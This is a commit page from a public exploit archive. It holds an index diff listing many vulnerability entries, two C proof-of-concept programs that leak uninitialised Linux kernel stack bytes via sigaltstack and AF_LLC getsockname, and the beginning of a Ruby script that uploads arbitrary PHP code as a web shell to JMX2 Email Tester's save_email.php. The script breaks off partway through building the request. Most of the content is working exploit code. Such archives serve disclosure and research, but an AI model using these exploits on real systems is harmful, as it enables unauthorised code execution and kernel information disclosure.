DB: 2016-02-18
2 new exploits
This commit is contained in:
parent
cc8580757a
commit
207c9bac9b
5 changed files with 391 additions and 274 deletions
16
files.csv
16
files.csv
|
@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port
|
|||
9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0
|
||||
9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0
|
||||
9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0
|
||||
9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
|
||||
9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
|
||||
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0
|
||||
9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0
|
||||
9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0
|
||||
|
@ -8978,7 +8978,7 @@ id,file,description,date,author,platform,type,port
|
|||
9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0
|
||||
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0
|
||||
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0
|
||||
9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
|
||||
9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
|
||||
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0
|
||||
9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0
|
||||
9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
|
||||
|
@ -8986,7 +8986,7 @@ id,file,description,date,author,platform,type,port
|
|||
9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
|
||||
9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
|
||||
9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
|
||||
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
|
||||
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
|
||||
9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
|
||||
9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
|
||||
9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
|
||||
|
@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port
|
|||
15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
|
||||
15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
|
||||
15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
|
||||
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
|
||||
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
|
||||
15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
|
||||
15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
|
||||
15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0
|
||||
|
@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port
|
|||
21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
|
||||
21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
|
||||
21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
|
||||
21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0
|
||||
21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
|
||||
21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
|
||||
21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
|
||||
21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0
|
||||
21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
|
||||
21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
|
||||
|
@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port
|
|||
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
|
||||
32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
|
||||
32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
|
||||
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
|
||||
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
|
||||
32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
|
||||
32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
|
||||
32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0
|
||||
|
@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port
|
|||
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
|
||||
39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0
|
||||
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
|
||||
39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
|
||||
39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -1,121 +1,121 @@
|
|||
/*
|
||||
* sigaltstack-leak.c
|
||||
*
|
||||
* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
|
||||
* Jon Oberheide <jon@oberheide.org>
|
||||
* http://jon.oberheide.org
|
||||
*
|
||||
* Information:
|
||||
*
|
||||
* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
|
||||
*
|
||||
* Ulrich Drepper correctly points out that there is generally padding in
|
||||
* the structure on 64-bit hosts, and that copying the structure from
|
||||
* kernel to user space can leak information from the kernel stack in those
|
||||
* padding bytes.
|
||||
*
|
||||
* Notes:
|
||||
*
|
||||
* Only 4 bytes of uninitialized kernel stack are leaked in the padding
|
||||
* between stack_t's ss_flags and ss_size. The disclosure only affects
|
||||
* affects 64-bit hosts.
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stddef.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
const int randcalls[] = {
|
||||
0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
|
||||
21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
|
||||
78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
|
||||
109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
|
||||
120, 121, 121, 123, 124, 125, 140, 141, 143, 146
|
||||
};
|
||||
|
||||
void
|
||||
dump(const unsigned char *p, unsigned l)
|
||||
{
|
||||
printf("stack_t:");
|
||||
while (l > 0) {
|
||||
printf(" ");
|
||||
if (l == 12) {
|
||||
printf("*** ");
|
||||
}
|
||||
printf("%02x", *p);
|
||||
if (l == 9) {
|
||||
printf(" ***");
|
||||
}
|
||||
++p; --l;
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
int
|
||||
main(void)
|
||||
{
|
||||
char *p;
|
||||
int call, ret;
|
||||
size_t size, ftest, stest;
|
||||
stack_t oss;
|
||||
|
||||
size = sizeof(stack_t);
|
||||
|
||||
printf("[+] Checking platform...\n");
|
||||
|
||||
if (size == 24) {
|
||||
printf("[+] sizeof(stack_t) = %zu\n", size);
|
||||
printf("[+] Correct size, 64-bit platform.\n");
|
||||
} else {
|
||||
printf("[-] sizeof(stack_t) = %zu\n", size);
|
||||
printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
|
||||
printf("[-] No information disclosure is possible.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
|
||||
stest = offsetof(stack_t, ss_size);
|
||||
|
||||
printf("[+] Checking for stack_t hole...\n");
|
||||
|
||||
if (ftest != stest) {
|
||||
printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
|
||||
printf("[+] Hole in stack_t present!\n", ftest, stest);
|
||||
} else {
|
||||
printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
|
||||
printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] Ready to call sigaltstack.\n\n");
|
||||
|
||||
for (ret = 5; ret > 0; ret--) {
|
||||
printf("%d...\n", ret);
|
||||
sleep(1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
|
||||
while (1) {
|
||||
/* random stuff to make stack pseudo-interesting */
|
||||
call = rand() % (sizeof(randcalls) / sizeof(int));
|
||||
syscall(randcalls[call]);
|
||||
|
||||
ret = sigaltstack(NULL, &oss);
|
||||
if (ret != 0) {
|
||||
printf("[-] Error: sigaltstack failed.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
dump((unsigned char *) &oss, sizeof(oss));
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2009-08-04]
|
||||
/*
|
||||
* sigaltstack-leak.c
|
||||
*
|
||||
* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
|
||||
* Jon Oberheide <jon@oberheide.org>
|
||||
* http://jon.oberheide.org
|
||||
*
|
||||
* Information:
|
||||
*
|
||||
* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
|
||||
*
|
||||
* Ulrich Drepper correctly points out that there is generally padding in
|
||||
* the structure on 64-bit hosts, and that copying the structure from
|
||||
* kernel to user space can leak information from the kernel stack in those
|
||||
* padding bytes.
|
||||
*
|
||||
* Notes:
|
||||
*
|
||||
* Only 4 bytes of uninitialized kernel stack are leaked in the padding
|
||||
* between stack_t's ss_flags and ss_size. The disclosure only affects
|
||||
* affects 64-bit hosts.
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stddef.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
const int randcalls[] = {
|
||||
0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
|
||||
21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
|
||||
78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
|
||||
109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
|
||||
120, 121, 121, 123, 124, 125, 140, 141, 143, 146
|
||||
};
|
||||
|
||||
void
|
||||
dump(const unsigned char *p, unsigned l)
|
||||
{
|
||||
printf("stack_t:");
|
||||
while (l > 0) {
|
||||
printf(" ");
|
||||
if (l == 12) {
|
||||
printf("*** ");
|
||||
}
|
||||
printf("%02x", *p);
|
||||
if (l == 9) {
|
||||
printf(" ***");
|
||||
}
|
||||
++p; --l;
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
int
|
||||
main(void)
|
||||
{
|
||||
char *p;
|
||||
int call, ret;
|
||||
size_t size, ftest, stest;
|
||||
stack_t oss;
|
||||
|
||||
size = sizeof(stack_t);
|
||||
|
||||
printf("[+] Checking platform...\n");
|
||||
|
||||
if (size == 24) {
|
||||
printf("[+] sizeof(stack_t) = %zu\n", size);
|
||||
printf("[+] Correct size, 64-bit platform.\n");
|
||||
} else {
|
||||
printf("[-] sizeof(stack_t) = %zu\n", size);
|
||||
printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
|
||||
printf("[-] No information disclosure is possible.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
|
||||
stest = offsetof(stack_t, ss_size);
|
||||
|
||||
printf("[+] Checking for stack_t hole...\n");
|
||||
|
||||
if (ftest != stest) {
|
||||
printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
|
||||
printf("[+] Hole in stack_t present!\n", ftest, stest);
|
||||
} else {
|
||||
printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
|
||||
printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] Ready to call sigaltstack.\n\n");
|
||||
|
||||
for (ret = 5; ret > 0; ret--) {
|
||||
printf("%d...\n", ret);
|
||||
sleep(1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
|
||||
while (1) {
|
||||
/* random stuff to make stack pseudo-interesting */
|
||||
call = rand() % (sizeof(randcalls) / sizeof(int));
|
||||
syscall(randcalls[call]);
|
||||
|
||||
ret = sigaltstack(NULL, &oss);
|
||||
if (ret != 0) {
|
||||
printf("[-] Error: sigaltstack failed.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
dump((unsigned char *) &oss, sizeof(oss));
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2009-08-04]
|
||||
|
|
|
@ -1,146 +1,146 @@
|
|||
/*
|
||||
* llc-getsockname-leak.c
|
||||
*
|
||||
* Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
|
||||
* Jon Oberheide <jon@oberheide.org>
|
||||
* http://jon.oberheide.org
|
||||
*
|
||||
* Information:
|
||||
*
|
||||
* http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
|
||||
*
|
||||
* sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
|
||||
* before copying to the above layer's structure.
|
||||
*
|
||||
* Notes:
|
||||
*
|
||||
* Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
|
||||
* as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
|
||||
* bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
|
||||
*/
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
#include <errno.h>
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <net/if_arp.h>
|
||||
|
||||
#ifndef AF_LLC
|
||||
#define AF_LLC 26
|
||||
#endif
|
||||
|
||||
#ifndef AF_LLC
|
||||
#define AF_LLC 26
|
||||
#endif
|
||||
|
||||
#ifndef LLC_SAP_NULL
|
||||
#define LLC_SAP_NULL 0x00
|
||||
#endif
|
||||
|
||||
#ifndef __LLC_SOCK_SIZE__
|
||||
#define __LLC_SOCK_SIZE__ 16
|
||||
struct sockaddr_llc {
|
||||
sa_family_t sllc_family;
|
||||
sa_family_t sllc_arphrd;
|
||||
unsigned char sllc_test;
|
||||
unsigned char sllc_xid;
|
||||
unsigned char sllc_ua;
|
||||
unsigned char sllc_sap;
|
||||
unsigned char sllc_mac[6];
|
||||
unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
|
||||
sizeof(unsigned char) * 4 - 6];
|
||||
};
|
||||
#endif
|
||||
|
||||
const int randcalls[] = {
|
||||
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
|
||||
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
|
||||
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
|
||||
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
|
||||
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
|
||||
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
|
||||
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
|
||||
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
|
||||
__NR_sched_getparam, __NR_sched_get_priority_max
|
||||
};
|
||||
|
||||
void
|
||||
dump(const unsigned char *p, unsigned l)
|
||||
{
|
||||
printf("sockaddr_llc:");
|
||||
while (l > 0) {
|
||||
printf(" ");
|
||||
if (l == 12 || l == 2) {
|
||||
printf("*** ");
|
||||
}
|
||||
printf("%02x", *p);
|
||||
if (l == 10 || l == 1) {
|
||||
printf(" ***");
|
||||
}
|
||||
++p; --l;
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
int
|
||||
main(void)
|
||||
{
|
||||
struct sockaddr_llc sllc;
|
||||
int ret, sock, call, sllc_len = sizeof(sllc);
|
||||
|
||||
printf("[+] Creating AF_LLC socket.\n");
|
||||
|
||||
sock = socket(AF_LLC, SOCK_DGRAM, 0);
|
||||
if (sock == -1) {
|
||||
printf("[-] Error: Couldn't create AF_LLC socket.\n");
|
||||
printf("[-] %s.\n", strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
memset(&sllc, 0, sllc_len);
|
||||
|
||||
sllc.sllc_family = AF_LLC;
|
||||
sllc.sllc_arphrd = ARPHRD_ETHER;
|
||||
sllc.sllc_sap = LLC_SAP_NULL;
|
||||
|
||||
printf("[+] Dummy sendto to autobind socket.\n");
|
||||
|
||||
ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
|
||||
if (ret == -1) {
|
||||
printf("[-] Error: sendto failed.\n");
|
||||
printf("[-] %s.\n", strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] Ready to call getsockname.\n\n");
|
||||
|
||||
for (ret = 5; ret > 0; ret--) {
|
||||
printf("%d...\n", ret);
|
||||
sleep(1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
|
||||
while (1) {
|
||||
/* random stuff to make stack pseudo-interesting */
|
||||
call = rand() % (sizeof(randcalls) / sizeof(int));
|
||||
syscall(randcalls[call]);
|
||||
|
||||
ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
|
||||
if (ret != 0) {
|
||||
printf("[-] Error: getsockname failed.\n");
|
||||
printf("[-] %s.\n", strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
dump((unsigned char *) &sllc, sizeof(sllc));
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2009-08-25]
|
||||
/*
|
||||
* llc-getsockname-leak.c
|
||||
*
|
||||
* Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
|
||||
* Jon Oberheide <jon@oberheide.org>
|
||||
* http://jon.oberheide.org
|
||||
*
|
||||
* Information:
|
||||
*
|
||||
* http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
|
||||
*
|
||||
* sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
|
||||
* before copying to the above layer's structure.
|
||||
*
|
||||
* Notes:
|
||||
*
|
||||
* Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
|
||||
* as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
|
||||
* bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
|
||||
*/
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
#include <errno.h>
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <net/if_arp.h>
|
||||
|
||||
#ifndef AF_LLC
|
||||
#define AF_LLC 26
|
||||
#endif
|
||||
|
||||
#ifndef AF_LLC
|
||||
#define AF_LLC 26
|
||||
#endif
|
||||
|
||||
#ifndef LLC_SAP_NULL
|
||||
#define LLC_SAP_NULL 0x00
|
||||
#endif
|
||||
|
||||
#ifndef __LLC_SOCK_SIZE__
|
||||
#define __LLC_SOCK_SIZE__ 16
|
||||
struct sockaddr_llc {
|
||||
sa_family_t sllc_family;
|
||||
sa_family_t sllc_arphrd;
|
||||
unsigned char sllc_test;
|
||||
unsigned char sllc_xid;
|
||||
unsigned char sllc_ua;
|
||||
unsigned char sllc_sap;
|
||||
unsigned char sllc_mac[6];
|
||||
unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
|
||||
sizeof(unsigned char) * 4 - 6];
|
||||
};
|
||||
#endif
|
||||
|
||||
const int randcalls[] = {
|
||||
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
|
||||
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
|
||||
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
|
||||
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
|
||||
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
|
||||
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
|
||||
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
|
||||
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
|
||||
__NR_sched_getparam, __NR_sched_get_priority_max
|
||||
};
|
||||
|
||||
void
|
||||
dump(const unsigned char *p, unsigned l)
|
||||
{
|
||||
printf("sockaddr_llc:");
|
||||
while (l > 0) {
|
||||
printf(" ");
|
||||
if (l == 12 || l == 2) {
|
||||
printf("*** ");
|
||||
}
|
||||
printf("%02x", *p);
|
||||
if (l == 10 || l == 1) {
|
||||
printf(" ***");
|
||||
}
|
||||
++p; --l;
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
int
|
||||
main(void)
|
||||
{
|
||||
struct sockaddr_llc sllc;
|
||||
int ret, sock, call, sllc_len = sizeof(sllc);
|
||||
|
||||
printf("[+] Creating AF_LLC socket.\n");
|
||||
|
||||
sock = socket(AF_LLC, SOCK_DGRAM, 0);
|
||||
if (sock == -1) {
|
||||
printf("[-] Error: Couldn't create AF_LLC socket.\n");
|
||||
printf("[-] %s.\n", strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
memset(&sllc, 0, sllc_len);
|
||||
|
||||
sllc.sllc_family = AF_LLC;
|
||||
sllc.sllc_arphrd = ARPHRD_ETHER;
|
||||
sllc.sllc_sap = LLC_SAP_NULL;
|
||||
|
||||
printf("[+] Dummy sendto to autobind socket.\n");
|
||||
|
||||
ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
|
||||
if (ret == -1) {
|
||||
printf("[-] Error: sendto failed.\n");
|
||||
printf("[-] %s.\n", strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] Ready to call getsockname.\n\n");
|
||||
|
||||
for (ret = 5; ret > 0; ret--) {
|
||||
printf("%d...\n", ret);
|
||||
sleep(1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
|
||||
while (1) {
|
||||
/* random stuff to make stack pseudo-interesting */
|
||||
call = rand() % (sizeof(randcalls) / sizeof(int));
|
||||
syscall(randcalls[call]);
|
||||
|
||||
ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
|
||||
if (ret != 0) {
|
||||
printf("[-] Error: getsockname failed.\n");
|
||||
printf("[-] %s.\n", strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
dump((unsigned char *) &sllc, sizeof(sllc));
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2009-08-25]
|
||||
|
|
45
platforms/multiple/webapps/39456.rb
Executable file
45
platforms/multiple/webapps/39456.rb
Executable file
|
@ -0,0 +1,45 @@
|
|||
# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
|
||||
# Date: 2016-02-15
|
||||
# Blog: http://www.hahwul.com
|
||||
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
|
||||
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
|
||||
# Tested on: debian [wheezy]
|
||||
# CVE : none
|
||||
|
||||
require "net/http"
|
||||
require "uri"
|
||||
require 'uri-handler'
|
||||
|
||||
if ARGV.length != 2
|
||||
|
||||
puts "JMX2 Email Tester Web Shell Uploader"
|
||||
puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
|
||||
puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
|
||||
puts " phpCode(ex): echo 'zzzzz'"
|
||||
puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
|
||||
puts " Install GEM: #> gem install uri-handler"
|
||||
puts " exploit & code by hahwul[www.hahwul.com]"
|
||||
else
|
||||
target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
|
||||
shell = ARGV[1] # PHP Code
|
||||
shell = shell.to_uri
|
||||
exp_url = target_url + "/models/save_email.php"
|
||||
puts shell
|
||||
uri = URI.parse(exp_url)
|
||||
http = Net::HTTP.new(uri.host, uri.port)
|
||||
puts exp_url
|
||||
request = Net::HTTP::Post.new(uri.request_uri)
|
||||
request["Accept-Encoding"] = "gzip, deflate"
|
||||
request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
|
